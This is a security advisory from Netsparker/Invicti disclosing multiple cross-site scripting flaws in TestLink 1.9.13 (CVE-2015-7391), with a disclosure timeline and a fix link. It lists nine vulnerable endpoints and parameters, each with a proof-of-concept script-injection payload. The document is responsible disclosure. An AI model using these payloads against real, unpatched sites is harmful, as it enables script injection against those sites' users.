Multiple Cross-site Scripting Vulnerabilities Identified in TestLink 1.9.13

Information

Advisory by Netsparker (now Invicti)
Name: Multiple XSS Vulnerabilities in TestLink 1.9.13
Affected Software: TestLink
Affected Versions: 1.9.1.3 and possibly below
Vendor Homepage: http://testlink.org/ 
Vulnerability Type: Cross-site Scripting
Severity: Important
Status: Fixed
CVE-ID: CVE-2015-7391
Invicti Advisory Reference: NS-15-016

Technical Details

Proof of Concept URLs for XSS in TestLink 1.9.13:

/testlink-code-1.9.13/lib/results/tcCreatedPerUserOnTestProject.php
Parameter Name: selected_end_date
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x008360)</scRipt>

/testlink-code-1.9.13/lib/results/tcCreatedPerUserOnTestProject.php
Parameter Name: selected_start_date
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x007F5A)</scRipt>

/testlink-code-1.9.13/lib/testcases/containerEdit.php
Parameter Name: containerType
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x0053E8)</scRipt>

/testlink-code-1.9.13/lib/testcases/listTestCases.php?feature=edit_tc
Parameter Name: filter_tc_id
Parameter Type: POST
Attack Pattern: "><body onload=alert(9)>

/testlink-code-1.9.13/lib/testcases/listTestCases.php?feature=edit_tc
Parameter Name: filter_testcase_name
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x0050D4)</scRipt>

/testlink-code-1.9.13/lib/testcases/tcImport.php?containerID=2&bIntoProject=1&useRecursion='"--></style></scRipt><scRipt>alert(0x004898)</scRipt>
Parameter Name: useRecursion
Parameter Type: GET
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x004898)</scRipt>

/testlink-code-1.9.13/lib/testcases/tcSearch.php
Parameter Name: targetTestCase
Parameter Type: POST
Attack Pattern: "><body onload=alert(9)>

/testlink-code-1.9.13/lib/testcases/tcSearch.php
Parameter Name: created_by
Parameter Type: POST
Attack Pattern: "><scRipt>alert(9)</scRipt>

/testlink-code-1.9.13/third_party/user_contribution/fakeRemoteExecServer/client4fakeXMLRPCTestRunner.php
Parameter Name: Referer
Parameter Type: HTTP Header
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x00FF1E)</scRipt>

For more information on cross-site scripting vulnerabilities, see Cross-site Scripting (XSS).

Advisory Timeline

15/09/2015 – First Contact
02/10/2015 – Vendor Fixed
05/10/2015 – Advisory Released

Solution

https://github.com/TestLinkOpenSourceTRMS/testlink-code/releases/tag/1.9.14

Credits & Authors

These issues have been discovered by Omar Kurt while testing Invicti Web Application Security Scanner.

About Invicti

Invicti Security is transforming the way web applications are secured. Invicti empowers organizations in every industry to scale their overall security operations, make the best use of their security resources, and engage developers in helping to improve their overall security posture.